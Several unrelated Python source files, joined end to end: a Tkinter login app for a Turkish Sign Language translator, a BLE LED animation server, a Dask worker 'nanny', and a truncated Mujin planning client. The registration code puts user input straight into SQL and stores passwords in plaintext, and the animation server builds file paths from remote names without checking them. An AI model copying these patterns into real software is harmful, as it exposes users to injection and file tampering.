self.username_label = ttk.Label(self.containerFrame, text="If you don't have ->")
self.username_label.grid(column=0, row=4, padx=10, pady=5, sticky=tk.NSEW)
self.register_button = ttk.Button(self.containerFrame, text="Register", command=self.register_user)
self.register_button.grid(column=1, row=4, padx=10, pady=5, sticky=tk.NSEW)
self.password_entry.bind("<Return>", lambda e: self.account_check())
self.username_entry.bind("<Return>", lambda e: self.account_check())
self.password_entry.bind("<Escape>", lambda e: self.exit_window())
self.username_entry.bind("<Escape>", lambda e: self.exit_window())
class RegisterUserWindow:
def __init__(self):
self.win2 = tk.Tk()
self.win2.title("Register")
self.db = Database("database.db")
self.widgets()
def create_user(self):
if self.username.get() == "" or self.password.get() == "":
msg.showerror("Warning!", "Fields can not be empty!")
else:
userlistcheck = self.db.queryFunction(
f"SELECT * FROM Users WHERE username = '{self.username.get()}' and password = '{self.password.get()}'")
if (len(userlistcheck) > 0):
msg.showerror("The user cannot be created.", "User exist")
else:
self.db.createUser(self.username.get(), self.password.get(), self.firstName.get(), self.lastName.get(),
self.age.get(), self.gender.get())
self.win2.destroy()
def exit_window(self):
self.win2.destroy()
def widgets(self):
self.containerFrame2 = ttk.LabelFrame(self.win2, text="Register a new User")
self.containerFrame2.grid(column=0, row=0, padx=10, pady=10, sticky=tk.NSEW)
self.username_label = ttk.Label(self.containerFrame2, text="Username:")
self.username_label.grid(column=0, row=0, padx=10, pady=5, sticky=tk.NSEW)
self.username = tk.StringVar(self.containerFrame2)
self.username_entry = ttk.Entry(self.containerFrame2, textvariable=self.username)
self.username_entry.grid(column=1, row=0, padx=10, pady=5, sticky=tk.NSEW)
self.password_label = ttk.Label(self.containerFrame2, text="Password:")
self.password_label.grid(column=0, row=1, padx=10, pady=5, sticky=tk.NSEW)
self.password = tk.StringVar(self.containerFrame2)
self.password_entry = ttk.Entry(self.containerFrame2, show="*", textvariable=self.password)
self.password_entry.grid(column=1, row=1, padx=10, pady=5, sticky=tk.NSEW)
self.firstName_label = ttk.Label(self.containerFrame2, text="First Name:")
self.firstName_label.grid(column=0, row=2, padx=10, pady=5, sticky=tk.NSEW)
self.firstName = tk.StringVar(self.containerFrame2)
self.firstName_entry = ttk.Entry(self.containerFrame2, textvariable=self.firstName)
self.firstName_entry.grid(column=1, row=2, padx=10, pady=5, sticky=tk.NSEW)
self.lastName_label = ttk.Label(self.containerFrame2, text="Last Name:")
self.lastName_label.grid(column=0, row=3, padx=10, pady=5, sticky=tk.NSEW)
self.lastName = tk.StringVar(self.containerFrame2)
self.lastName_entry = ttk.Entry(self.containerFrame2, textvariable=self.lastName)
self.lastName_entry.grid(column=1, row=3, padx=10, pady=5, sticky=tk.NSEW)
self.age_label = ttk.Label(self.containerFrame2, text="Age:")
self.age_label.grid(column=0, row=4, padx=10, pady=5, sticky=tk.NSEW)
self.age = tk.StringVar(self.containerFrame2)
self.age_entry = ttk.Entry(self.containerFrame2, textvariable=self.age)
self.age_entry.grid(column=1, row=4, padx=10, pady=5, sticky=tk.NSEW)
self.gender_label = ttk.Label(self.containerFrame2, text="Gender:")
self.gender_label.grid(column=0, row=5, padx=10, pady=5, sticky=tk.NSEW)
self.gender = tk.StringVar(self.containerFrame2)
self.gender_combobox = ttk.Combobox(self.containerFrame2, width=12, textvariable=self.gender)
self.gender_combobox['values'] = ('Male', 'Female', 'Other')
self.gender_combobox.grid(column=1, row=5, padx=10, pady=5, sticky=tk.NSEW)
self.gender_combobox.current(0)
self.ok_button = ttk.Button(self.containerFrame2, text="OK", command=self.create_user)
self.ok_button.grid(column=0, row=6, padx=10, pady=5, sticky=tk.NSEW)
self.cancel_button = ttk.Button(self.containerFrame2, text="Cancel", command=self.exit_window)
self.cancel_button.grid(column=1, row=6, padx=10, pady=5, sticky=tk.NSEW)
self.password_entry.bind("<Return>", lambda e: self.create_user())
self.username_entry.bind("<Return>", lambda e: self.create_user())
self.password_entry.bind("<Escape>", lambda e: self.exit_window())
self.username_entry.bind("<Escape>", lambda e: self.exit_window())
class MainWindow:
def __init__(self, username):
self.win3 = tk.Tk()
self.win3.title("Turkish Sign Language Translator")
self.db = Database("database.db")
self.cameraFrame = None
self.signImage = None
self.predictionLabel = None
self.translationResult = None
self.username = username
self.widgets()
def exit_window(self):
self.cameraFrame.vid.running = False
self.win3.quit()
self.win3.destroy()
quit()
def about_window(self):
msg.showinfo("About us", "This project created by: \nCanberk Enes SEN - 1609998, Muhammet Musa CAM - 1728774 and Furkan GULLE - 1728824 ")
def on_closing(self):
self.cameraFrame.vid.running = False
self.win3.quit()
self.win3.destroy()
exit()
def widgets(self):
menu_bar = Menu(self.win3)
self.win3.config(menu=menu_bar)
file_menu = Menu(menu_bar, tearoff=0)
menu_bar.add_cascade(label="File", menu=file_menu)
file_menu.add_command(label="Exit", command=self.exit_window)
file_menu.add_separator()
help_menu = Menu(menu_bar, tearoff=0)
menu_bar.add_cascade(label="Help", menu=help_menu)
help_menu.add_command(label="About", command=self.about_window)
self.win3.columnconfigure(0, weight=0)
self.win3.columnconfigure(1, weight=1)
self.win3.rowconfigure(0, weight=0)
self.containerFrame3 = ttk.LabelFrame(self.win3, text="Info")
self.containerFrame3.grid(column=0, row=0, padx=10, pady=10, sticky=tk.NSEW)
self.welcome_user = ttk.Label(self.containerFrame3, text=f"Hi {self.username.get()}!")
self.welcome_user.grid(column=0, row=0, padx=5, pady=5, sticky=tk.NSEW)
self.takenote_label = ttk.Label(self.containerFrame3, text="Take a note ✎")
self.takenote_label.grid(column=0, row=1, padx=5, pady=(10, 5), sticky=tk.NSEW)
self.take_note = scrolledtext.ScrolledText(self.containerFrame3, width=15, height=20)
self.take_note.grid(column=0, row=2, padx=5, pady=5, sticky=tk.NS)
self.exit_button = ttk.Button(self.containerFrame3, text="Exit", command=self.exit_window)
self.exit_button.grid(column=0, row=3, padx=5, pady=5, sticky=tk.NSEW)
self.containerFrame4 = ttk.LabelFrame(self.win3, text="Translation")
self.containerFrame4.grid(column=1, row=0, padx=10, pady=10, sticky=tk.NSEW)
self.cameraImageLabel = ttk.Label(self.containerFrame4, text="Camera")
self.cameraImageLabel.grid(column=1, row=0, padx=20, pady=5, sticky=tk.EW)
self.cameraFrame = CameraFrame(self.containerFrame4, video_source=0, width=400)
self.cameraFrame.grid(column=1, row=1, padx=20, pady=5, sticky=tk.EW)
self.signImageLabel = ttk.Label(self.containerFrame4, text="Sign Image")
self.signImageLabel.grid(column=0, row=0, padx=5, pady=5, sticky=tk.EW)
self.signImage = RoiFrame(self.containerFrame4, self.cameraFrame.vid, self.cameraFrame.vid.fps)
self.signImage.grid(column=0, row=1, padx=5, pady=5, sticky=tk.EW)
self.predictionLabel = PredictedText(self.containerFrame4, self.cameraFrame.vid, self.cameraFrame.vid.fps)
self.predictionLabel.grid(column=0, row=2, padx=5, pady=5, columnspan=3)
self.translationResultLabel = ttk.Label(self.containerFrame4, text="Result")
self.translationResultLabel.grid(column=0, row=2, padx=5, pady=5, sticky=tk.EW)
self.translationResult = PredictionText(self.containerFrame4, self.cameraFrame.vid, self.cameraFrame.vid.fps)
self.translationResult.grid(column=0, row=3, padx=5, pady=5, columnspan=3)
self.win3.bind("<Escape>", lambda e: self.exit_window())
class Database:
def __init__(self, db):
self.conn = sqlite3.connect(db)
self.cur = self.conn.cursor()
self.cur.execute("""
CREATE TABLE IF NOT EXISTS Users (
id INTEGER PRIMARY KEY AUTOINCREMENT,
username TEXT NOT NULL UNIQUE,
password TEXT NOT NULL,
firstName TEXT,
lastName TEXT,
age INTEGER,
gender TEXT
);
""")
self.conn.commit()
def query_func2(self, query):
data = self.cur.execute(query)
rows = data.fetchone()
return rows
def queryFunction(self, query):
data = self.cur.execute(query)
rows = data.fetchall()
return rows
def createUser(self, username, password, firstName, lastName, age, gender):
self.cur.execute("INSERT INTO Users VALUES (NULL, ?, ?, ?, ?, ?, ?)",
(username, password, firstName, lastName, age, gender))
self.conn.commit()
def removeUser(self, id):
self.cur.execute("DELETE FROM Users WHERE id=?", (id,))
self.conn.commit()
def updateUser(self, username, password, firstName, lastName, age, gender, id):
self.cur.execute(
"UPDATE Users SET username = ?, password = ?, firstName = ?, lastName = ?, age = ?, gender = ? WHERE id = ?",
(username, password, firstName, lastName, age, gender, id))
self.conn.commit()
if __name__ == "__main__":
app = LoginWindow()
app.win.mainloop()
|
sparklet.py
|
import fire
import logging
import os
import tempfile
import yaml
from datetime import datetime
from animate import Animator, play_by_id, clear_display
from animation import Animation
from ble_device import BleDevice
from multiprocessing import Process, Queue
from protocol import EPXProtocol, EPXCommand, ProtocolFormat
from serial_device import SerialDevice
from signal import signal, SIGINT
from sys import exit
from collections import namedtuple
DISPLAYWIDTH = 18
DISPLAYHEIGHT = 18
class Sparklet:
def __init__(self):
signal(SIGINT, self.on_sigint)
self.animations_dir = os.path.join(os.getcwd(), 'animations')
os.makedirs(self.animations_dir, exist_ok=True)
self.protocol = EPXProtocol()
self.animator_process = None
self.command_handlers = [
self.on_connect_headerrq,
self.on_clear_display,
self.on_display_brightness,
self.on_enumerate_animations,
self.on_preview_color,
self.on_upload_frame8,
self.on_upload_animation8,
self.on_upload_pixel8,
self.on_remove_animation,
self.on_store_animation,
self.on_play_stored_animation8,
self.on_play_stored_animation8_byname,
self.on_set_device_name,
self.on_request_thumbnail,
self.on_set_key,
self.on_console_command
]
with open('settings.yaml', 'r') as fh:
self.settings = yaml.load(fh, Loader=yaml.FullLoader)
#self.start_animation_process()
def start_animation_process(self):
#self.animator = Animator()
self.frames_queue = Queue()
self.count = 0
args = (self.frames_queue, )
self.animator_process = Process(target=play_frames, args=args)
self.animator_process.start()
def stop_animation_process(self):
if not self.animator_process:
return
def run_animation_process(self, target, args):
if self.animator_process:
self.animator_process.terminate()
self.animator_process.join()
self.animator_process = Process(target=target, args=args)
self.animator_process.start()
def ble(self):
self.device = BleDevice(self)
logging.info('Starting Sparklet')
self.device.start()
logging.info('Hit <ENTER> to disconnect')
input()
self.device.stop()
self.stop_animation_process()
logging.info('Sparklet stopped')
def serial(self):
self.device = SerialDevice(self)
logging.info('Starting Sparklet')
self.device.start()
self.stop_animation_process()
logging.info('Sparklet stopped')
def on_sigint(self, signum, frame):
self.device.stop()
logging.info('Sparklet stopped')
exit(0)
def on_read_notify(self):
logging.info(f'Sparklet.on_read_notify')
def on_read_request(self, offset):
logging.info(f'Sparklet.on_read_request {offset}')
def on_write_request(self, data, offset):
logging.debug(f'Sparklet.on_write_request received {len(data)} bytes at {datetime.now().strftime("%m/%d/%Y-%I:%M:%S.%f")}')
commands, send_ack = self.protocol.decode(data)
for command in commands:
header, payload = command
logging.info(f'Sparklet.on_write_request {EPXCommand(header.command)} - {header.transaction_id}')
logging.debug(f'Sparklet.on_write_request {payload}')
handler = self.command_handlers[header.command - 1]
success = handler(header, payload)
if send_ack:
frames = self.protocol.encode_binaryack()
logging.debug(f'Sparklet.on_write_request sending BINARY ACK at {datetime.now().strftime("%m/%d/%Y-%I:%M:%S.%f")}')
self._send_frames(frames)
return True
def _send_frames(self, frames):
for frame in frames:
logging.debug(f'Sparklet.on_enumerate_animations sent {len(frame)} bytes')
self.device.write(frame)
return True
def on_connect_headerrq(self, command, payload):
data = {
'status': 'success',
'TransactionID': command.transaction_id,
'data': {
'FIRMWARE': '0.1',
'DEVICENAME': self.device.name,
'CAPABILITIES': ['STORAGE'], #'PREVIEW',
'BATTERY': { 'PCT': 100 },
'DISPLAYWIDTH': DISPLAYWIDTH,
'DISPLAYHEIGHT': DISPLAYHEIGHT,
'AUTOPLAY': 1,
'BRIGHTNESS': self.settings['brightness']
},
}
frames = self.protocol.encode(data, ProtocolFormat.JSON.value, 0)
return self._send_frames(frames)
def on_clear_display(self, header, payload):
self.run_animation_process(clear_display, ())
return True
def on_display_brightness(self, header, payload):
self.settings['brightness'] = payload.Brightness
with open('settings.yaml', 'w') as fh:
yaml.dump(self.settings, fh)
return True
def get_animations_list(self):
files = [f for f in os.listdir(self.animations_dir)]
animations = []
for file in files:
filepath = os.path.join(self.animations_dir, file)
st = os.stat(filepath)
animation = Animation.load(filepath)
item = {}
item['ID'] = animation.id
item['Filename'] = animation.name
item['Size'] = st.st_size
item['UTC'] = animation.utc
animations.append(item)
return animations
def on_enumerate_animations(self, header, payload):
df = os.statvfs('/')
space_used = df.f_bfree / df.f_blocks * 100
data = {
'status': 'success',
'TransactionID': payload.TransactionID,
'StorageUsed': space_used,
'Sequences': self.get_animations_list()
}
frames = self.protocol.encode(data, ProtocolFormat.JSON.value, 0)
return self._send_frames(frames)
def on_preview_color(self, header, payload):
pass
def on_upload_frame8(self, header, payload):
# TODO:
# upload_frame requires a serious amount of CPU
# to support live preview. The support for interprocess
# communication is a bit weak on Python and shared memory
# support is not coming till Python3.8 which is not yet
# supported on Raspberry Pi
# self.frames_queue.put(payload.data)
# self.count += 1
# logging.info(f'put={self.frames_queue.qsize()}')
return True
def on_upload_animation8(self, header, payload):
pass
def on_upload_pixel8(self, header, payload):
pass
def on_remove_animation(self, header, payload):
files = [f for f in os.listdir(self.animations_dir)]
for file in files:
filepath = os.path.join(self.animations_dir, file)
animation = Animation.load(filepath)
if animation.id == payload.ID:
os.remove(filepath)
break
return True
def on_store_animation(self, header, payload):
filename = os.path.join(self.animations_dir, payload.name)
Animation.save(filename, payload)
return True
def on_play_stored_animation8(self, header, payload):
self.run_animation_process(play_by_id, (payload.ID,))
return True
def on_play_stored_animation8_byname(self, header, payload):
self.run_animation_process(play_by_id, (payload.Name,))
return True
def on_set_device_name(self, header, payload):
pass
def on_request_thumbnail(self, header, payload):
pass
def on_set_key(self, header, payload):
pass
def on_console_command(self, header, payload):
pass
if __name__ == '__main__':
logging.basicConfig(level=logging.DEBUG)
fire.Fire(Sparklet)
|
nanny.py
|
from __future__ import print_function, division, absolute_import
from datetime import timedelta
import logging
from multiprocessing.queues import Empty
import os
import psutil
import shutil
import threading
from tornado import gen
from tornado.ioloop import IOLoop, TimeoutError
from tornado.locks import Event
from .comm import get_address_host, get_local_address_for, unparse_host_port
from .config import config
from .core import rpc, RPCClosed, CommClosedError, coerce_to_address
from .metrics import time
from .node import ServerNode
from .process import AsyncProcess
from .proctitle import enable_proctitle_on_children
from .security import Security
from .utils import (get_ip, mp_context, silence_logging, json_load_robust,
PeriodicCallback)
from .worker import _ncores, run, parse_memory_limit
logger = logging.getLogger(__name__)
class Nanny(ServerNode):
""" A process to manage worker processes
The nanny spins up Worker processes, watches then, and kills or restarts
them as necessary.
"""
process = None
status = None
def __init__(self, scheduler_ip=None, scheduler_port=None,
scheduler_file=None, worker_port=0,
ncores=None, loop=None, local_dir=None, services=None,
name=None, memory_limit='auto', reconnect=True,
validate=False, quiet=False, resources=None, silence_logs=None,
death_timeout=None, preload=(), preload_argv=[], security=None,
contact_address=None, listen_address=None, **kwargs):
if scheduler_file:
cfg = json_load_robust(scheduler_file)
self.scheduler_addr = cfg['address']
elif scheduler_ip is None and config.get('scheduler-address'):
self.scheduler_addr = config['scheduler-address']
elif scheduler_port is None:
self.scheduler_addr = coerce_to_address(scheduler_ip)
else:
self.scheduler_addr = coerce_to_address((scheduler_ip, scheduler_port))
self._given_worker_port = worker_port
self.ncores = ncores or _ncores
self.reconnect = reconnect
self.validate = validate
self.resources = resources
self.death_timeout = death_timeout
self.preload = preload
self.preload_argv = preload_argv
self.contact_address = contact_address
self.memory_terminate_fraction = config.get('worker-memory-terminate', 0.95)
self.security = security or Security()
assert isinstance(self.security, Security)
self.connection_args = self.security.get_connection_args('worker')
self.listen_args = self.security.get_listen_args('worker')
self.local_dir = local_dir
self.loop = loop or IOLoop.current()
self.scheduler = rpc(self.scheduler_addr, connection_args=self.connection_args)
self.services = services
self.name = name
self.quiet = quiet
self.auto_restart = True
self.memory_limit = parse_memory_limit(memory_limit, self.ncores)
if silence_logs:
silence_logging(level=silence_logs)
self.silence_logs = silence_logs
handlers = {'instantiate': self.instantiate,
'kill': self.kill,
'restart': self.restart,
# cannot call it 'close' on the rpc side for naming conflict
'terminate': self._close,
'run': self.run}
super(Nanny, self).__init__(handlers, io_loop=self.loop,
connection_args=self.connection_args,
**kwargs)
if self.memory_limit:
pc = PeriodicCallback(self.memory_monitor, 100, io_loop=self.loop)
self.periodic_callbacks['memory'] = pc
self._listen_address = listen_address
self.status = 'init'
def __repr__(self):
return "<Nanny: %s, threads: %d>" % (self.worker_address, self.ncores)
@gen.coroutine
def _unregister(self, timeout=10):
if self.process is None:
return
worker_address = self.process.worker_address
if worker_address is None:
return
allowed_errors = (gen.TimeoutError, CommClosedError, EnvironmentError, RPCClosed)
try:
yield gen.with_timeout(timedelta(seconds=timeout),
self.scheduler.unregister(address=self.worker_address),
quiet_exceptions=allowed_errors)
except allowed_errors:
pass
@property
def worker_address(self):
return None if self.process is None else self.process.worker_address
@property
def worker_dir(self):
return None if self.process is None else self.process.worker_dir
@gen.coroutine
def _start(self, addr_or_port=0):
""" Start nanny, start local process, start watching """
# XXX Factor this out
if not addr_or_port:
# Default address is the required one to reach the scheduler
self.listen(get_local_address_for(self.scheduler.address),
listen_args=self.listen_args)
self.ip = get_address_host(self.address)
elif isinstance(addr_or_port, int):
# addr_or_port is an integer => assume TCP
self.ip = get_ip(
get_address_host(self.scheduler.address)
)
self.listen((self.ip, addr_or_port),
listen_args=self.listen_args)
else:
self.listen(addr_or_port, listen_args=self.listen_args)
self.ip = get_address_host(self.address)
logger.info(' Start Nanny at: %r', self.address)
response = yield self.instantiate()
if response == 'running':
assert self.worker_address
self.status = 'running'
else:
yield self._close()
self.start_periodic_callbacks()
def start(self, addr_or_port=0):
self.loop.add_callback(self._start, addr_or_port)
@gen.coroutine
def kill(self, comm=None, timeout=2):
""" Kill the local worker process
Blocks until both the process is down and the scheduler is properly
informed
"""
self.auto_restart = False
if self.process is None:
raise gen.Return('OK')
deadline = self.loop.time() + timeout
yield self.process.kill(timeout=0.8 * (deadline - self.loop.time()))
yield self._unregister(deadline - self.loop.time())
@gen.coroutine
def instantiate(self, comm=None):
""" Start a local worker process
Blocks until the process is up and the scheduler is properly informed
"""
if self._listen_address:
start_arg = self._listen_address
else:
host = self.listener.bound_address[0]
start_arg = self.listener.prefix + unparse_host_port(host,
self._given_worker_port)
if self.process is None:
self.process = WorkerProcess(
worker_args=(self.scheduler_addr,),
worker_kwargs=dict(ncores=self.ncores,
local_dir=self.local_dir,
services=self.services,
service_ports={'nanny': self.port},
name=self.name,
memory_limit=self.memory_limit,
reconnect=self.reconnect,
resources=self.resources,
validate=self.validate,
silence_logs=self.silence_logs,
death_timeout=self.death_timeout,
preload=self.preload,
preload_argv=self.preload_argv,
security=self.security,
contact_address=self.contact_address),
worker_start_args=(start_arg,),
silence_logs=self.silence_logs,
on_exit=self._on_exit,
)
self.auto_restart = True
if self.death_timeout:
try:
result = yield gen.with_timeout(
timedelta(seconds=self.death_timeout),
self.process.start()
)
except gen.TimeoutError:
yield self._close(timeout=self.death_timeout)
raise gen.Return('timed out')
else:
result = yield self.process.start()
raise gen.Return(result)
@gen.coroutine
def restart(self, comm=None, timeout=2, executor_wait=True):
start = time()
@gen.coroutine
def _():
if self.process is not None:
yield self.kill()
yield self.instantiate()
try:
yield gen.with_timeout(timedelta(seconds=timeout), _())
except gen.TimeoutError:
logger.error("Restart timed out, returning before finished")
raise gen.Return('timed out')
else:
raise gen.Return('OK')
def memory_monitor(self):
""" Track worker's memory. Restart if it goes above 95% """
if self.status != 'running':
return
memory = psutil.Process(self.process.pid).memory_info().rss
frac = memory / self.memory_limit
if self.memory_terminate_fraction and frac > self.memory_terminate_fraction:
logger.warning("Worker exceeded 95% memory budget. Restarting")
self.process.process.terminate()
def is_alive(self):
return self.process is not None and self.process.status == 'running'
def run(self, *args, **kwargs):
return run(self, *args, **kwargs)
@gen.coroutine
def _on_exit(self, exitcode):
if self.status not in ('closing', 'closed'):
try:
yield self.scheduler.unregister(address=self.worker_address)
except (EnvironmentError, CommClosedError):
if not self.reconnect:
yield self._close()
return
try:
if self.status not in ('closing', 'closed'):
if self.auto_restart:
logger.warning("Restarting worker")
yield self.instantiate()
except Exception:
logger.error("Failed to restart worker after its process exited",
exc_info=True)
@property
def pid(self):
return self.process and self.process.pid
@gen.coroutine
def _close(self, comm=None, timeout=5, report=None):
"""
Close the worker process, stop all comms.
"""
if self.status in ('closing', 'closed'):
raise gen.Return('OK')
self.status = 'closing'
logger.info("Closing Nanny at %r", self.address)
self.stop()
try:
if self.process is not None:
yield self.kill(timeout=timeout)
except Exception:
pass
self.process = None
self.rpc.close()
self.scheduler.close_rpc()
self.status = 'closed'
raise gen.Return('OK')
class WorkerProcess(object):
def __init__(self, worker_args, worker_kwargs, worker_start_args,
silence_logs, on_exit):
self.status = 'init'
self.silence_logs = silence_logs
self.worker_args = worker_args
self.worker_kwargs = worker_kwargs
self.worker_start_args = worker_start_args
self.on_exit = on_exit
self.process = None
# Initialized when worker is ready
self.worker_dir = None
self.worker_address = None
@gen.coroutine
def start(self):
"""
Ensure the worker process is started.
"""
enable_proctitle_on_children()
if self.status == 'running':
raise gen.Return(self.status)
if self.status == 'starting':
yield self.running.wait()
raise gen.Return(self.status)
while True:
# FIXME: this sometimes stalls in _wait_until_connected
# our temporary solution is to retry a few times if the process
# doesn't start up in five seconds
self.init_result_q = mp_context.Queue()
self.child_stop_q = mp_context.Queue()
try:
self.process = AsyncProcess(
target=self._run,
kwargs=dict(worker_args=self.worker_args,
worker_kwargs=self.worker_kwargs,
worker_start_args=self.worker_start_args,
silence_logs=self.silence_logs,
init_result_q=self.init_result_q,
child_stop_q=self.child_stop_q),
)
self.process.daemon = True
self.process.set_exit_callback(self._on_exit)
self.running = Event()
self.stopped = Event()
self.status = 'starting'
yield self.process.start()
if self.status == 'starting':
yield gen.with_timeout(timedelta(seconds=5),
self._wait_until_started())
except gen.TimeoutError:
logger.info("Failed to start worker process. Restarting")
yield gen.with_timeout(timedelta(seconds=1),
self.process.terminate())
else:
break
if self.status == 'starting':
msg = yield self._wait_until_connected()
if not msg:
raise gen.Return(self.status)
self.worker_address = msg['address']
self.worker_dir = msg['dir']
assert self.worker_address
self.status = 'running'
self.running.set()
raise gen.Return(self.status)
def _on_exit(self, proc):
if proc is not self.process:
# Ignore exit of old process instance
return
self.mark_stopped()
def _death_message(self, pid, exitcode):
assert exitcode is not None
if exitcode == 255:
return "Worker process %d was killed by unknown signal" % (pid,)
elif exitcode >= 0:
return "Worker process %d exited with status %d" % (pid, exitcode,)
else:
return "Worker process %d was killed by signal %d" % (pid, -exitcode,)
def is_alive(self):
return self.process is not None and self.process.is_alive()
@property
def pid(self):
return (self.process.pid
if self.process and self.process.is_alive()
else None)
def mark_stopped(self):
if self.status != 'stopped':
r = self.process.exitcode
assert r is not None
if r != 0:
msg = self._death_message(self.process.pid, r)
logger.warning(msg)
self.status = 'stopped'
self.stopped.set()
# Release resources
self.process.close()
self.init_result_q = None
self.child_stop_q = None
self.process = None
# Best effort to clean up worker directory
if self.worker_dir and os.path.exists(self.worker_dir):
shutil.rmtree(self.worker_dir, ignore_errors=True)
self.worker_dir = None
# User hook
if self.on_exit is not None:
self.on_exit(r)
@gen.coroutine
def kill(self, timeout=2, executor_wait=True):
"""
Ensure the worker process is stopped, waiting at most
*timeout* seconds before terminating it abruptly.
"""
loop = IOLoop.current()
deadline = loop.time() + timeout
if self.status == 'stopped':
return
if self.status == 'stopping':
yield self.stopped.wait()
return
assert self.status in ('starting', 'running')
self.status = 'stopping'
process = self.process
self.child_stop_q.put({'op': 'stop',
'timeout': max(0, deadline - loop.time()) * 0.8,
'executor_wait': executor_wait,
})
while process.is_alive() and loop.time() < deadline:
yield gen.sleep(0.05)
if process.is_alive():
logger.warning("Worker process still alive after %d seconds, killing",
timeout)
try:
yield process.terminate()
except Exception as e:
logger.error("Failed to kill worker process: %s", e)
@gen.coroutine
def _wait_until_started(self):
delay = 0.05
while True:
if self.status != 'starting':
return
try:
msg = self.init_result_q.get_nowait()
assert msg == 'started', msg
return
except Empty:
yield gen.sleep(delay)
continue
@gen.coroutine
def _wait_until_connected(self):
delay = 0.05
while True:
if self.status != 'starting':
return
try:
msg = self.init_result_q.get_nowait()
except Empty:
yield gen.sleep(delay)
continue
if isinstance(msg, Exception):
logger.error("Failed while trying to start worker process",
exc_info=True)
yield self.process.join()
raise msg
else:
raise gen.Return(msg)
@classmethod
def _run(cls, worker_args, worker_kwargs, worker_start_args,
silence_logs, init_result_q, child_stop_q): # pragma: no cover
from distributed import Worker
try:
from dask.multiprocessing import initialize_worker_process
except ImportError: # old Dask version
pass
else:
initialize_worker_process()
if silence_logs:
logger.setLevel(silence_logs)
IOLoop.clear_instance()
loop = IOLoop()
loop.make_current()
worker = Worker(*worker_args, **worker_kwargs)
@gen.coroutine
def do_stop(timeout=5, executor_wait=True):
try:
yield worker._close(report=False,
nanny=False,
executor_wait=executor_wait,
timeout=timeout)
finally:
loop.stop()
def watch_stop_q():
"""
Wait for an incoming stop message and then stop the
worker cleanly.
"""
while True:
try:
msg = child_stop_q.get(timeout=1000)
except Empty:
pass
else:
assert msg.pop('op') == 'stop'
loop.add_callback(do_stop, **msg)
break
t = threading.Thread(target=watch_stop_q, name="Nanny stop queue watch")
t.daemon = True
t.start()
@gen.coroutine
def run():
"""
Try to start worker and inform parent of outcome.
"""
init_result_q.put('started')
try:
yield worker._start(*worker_start_args)
except Exception as e:
logger.exception("Failed to start worker")
init_result_q.put(e)
else:
assert worker.address
init_result_q.put({'address': worker.address,
'dir': worker.local_dir})
yield worker.wait_until_closed()
logger.info("Worker closed")
try:
loop.run_sync(run)
except TimeoutError:
# Loop was stopped before wait_until_closed() returned, ignore
pass
except KeyboardInterrupt:
pass
|
planningclient.py
|
# -*- coding: utf-8 -*-
# Copyright (C) 2012-2016 MUJIN Inc
"""
Planning client
"""
# System imports
import threading
import weakref
import os
import time
# Mujin imports
from . import APIServerError, GetMonotonicTime
from . import controllerclientbase, zmqclient
from . import zmq
# Logging
import logging
log = logging.getLogger(__name__)
def GetAPIServerErrorFromZMQ(response):
"""If response is an error, return the APIServerError instantiated from the response's error field. Otherwise return None
"""
if response is None:
return None
if 'error' in response:
if isinstance(response['error'], dict):
return APIServerError(response['error']['description'], response['error']['errorcode'], response['error'].get('inputcommand',None), response['error'].get('detailInfoType',None), response['error'].get('detailInfo',None))
else:
return APIServerError(response['error'])
elif 'exception' in response:
return APIServerError(response['exception'])
elif 'status' in response and response['status'] != 'succeeded':
# something happened so raise exception
return APIServerError(u'Resulting status is %s' % response['status'])
class PlanningControllerClient(controllerclientbase.ControllerClient):
"""Mujin controller client for planning tasks
"""
_usewebapi = True # if True use the HTTP webapi, otherwise the zeromq webapi (internal use only)
_sceneparams = None
scenepk = None # The scenepk this controller is configured for
_ctx = None # zmq context shared among all clients
_ctxown = None # zmq context owned by this class
_isok = False # If False, client is about to be destroyed
_heartbeatthread = None # Thread for monitoring controller heartbeat
_isokheartbeat = False # If False, then stop heartbeat monitor
_taskstate = None # Latest task status from heartbeat message
_commandsocket = None # zmq client to the command port
_configsocket = None # zmq client to the config port
def __init__(self, taskzmqport, taskheartbeatport, taskheartbeattimeout, tasktype, scenepk, usewebapi=True, ctx=None, slaverequestid=None, **kwargs):
"""Logs into the mujin controller and initializes the task's zmq connection
:param taskzmqport: Port of the task's zmq server, e.g. 7110
:param taskheartbeatport: Port of the task's zmq server's heartbeat publisher, e.g. 7111
:param taskheartbeattimeout: Seconds until reinitializing task's zmq server if no heartbeat is received, e.g. 7
:param tasktype: Type of the task
:param scenepk: Primary key (pk) of the bin picking task scene, e.g. irex2013.mujin.dae
"""
super(PlanningControllerClient, self).__init__(**kwargs)
self._slaverequestid = slaverequestid
self._sceneparams = {}
self._isok = True
# Task
self.tasktype = tasktype
self._usewebapi = usewebapi
# Connects to task's zmq server
self._commandsocket = None
self._configsocket = None
if taskzmqport is not None:
if ctx is None:
self._ctx = zmq.Context()
self._ctxown = self._ctx
else:
self._ctx = ctx
self.taskzmqport = taskzmqport
self._commandsocket = zmqclient.ZmqClient(self.controllerIp, taskzmqport, ctx)
self._configsocket = zmqclient.ZmqClient(self.controllerIp, taskzmqport + 2, ctx)
self.taskheartbeatport = taskheartbeatport
self.taskheartbeattimeout = taskheartbeattimeout
if self.taskheartbeatport is not None:
self._isokheartbeat = True
self._heartbeatthread = threading.Thread(target=weakref.proxy(self)._RunHeartbeatMonitorThread)
self._heartbeatthread.start()
self.SetScenePrimaryKey(scenepk)
def __del__(self):
self.Destroy()
def Destroy(self):
self.SetDestroy()
if self._heartbeatthread is not None:
self._isokheartbeat = False
self._heartbeatthread.join()
self._heartbeatthread = None
if self._commandsocket is not None:
self._commandsocket.Destroy()
self._commandsocket = None
if self._configsocket is not None:
self._configsocket.Destroy()
self._configsocket = None
if self._ctxown is not None:
try:
self._ctxown.destroy()
except Exception:
pass
self._ctxown = None
super(PlanningControllerClient, self).Destroy()
def SetDestroy(self):
self._isok = False
self._isokheartbeat = False
commandsocket = self._commandsocket
if commandsocket is not None:
commandsocket.SetDestroy()
configsocket = self._configsocket
if configsocket is not None:
configsocket.SetDestroy()
super(PlanningControllerClient, self).SetDestroy()
def GetSlaveRequestId(self):
return self._slaverequestid
def GetCommandSocketRaw(self):
return self._commandsocket
def DeleteJobs(self, usewebapi=True, timeout=5):
"""Cancels all jobs
"""
if usewebapi:
super(PlanningControllerClient, self).DeleteJobs(usewebapi, timeout)
else:
# Cancel on the zmq configure
if self._configsocket is not None:
self._SendConfigViaZMQ({'command': 'cancel'}, slaverequestid=self._slaverequestid, timeout=timeout, fireandforget=False)
def _RunHeartbeatMonitorThread(self, reinitializetimeout=10.0):
while self._isok and self._isokheartbeat:
log.info(u'subscribing to %s:%s' % (self.controllerIp, self.taskheartbeatport))
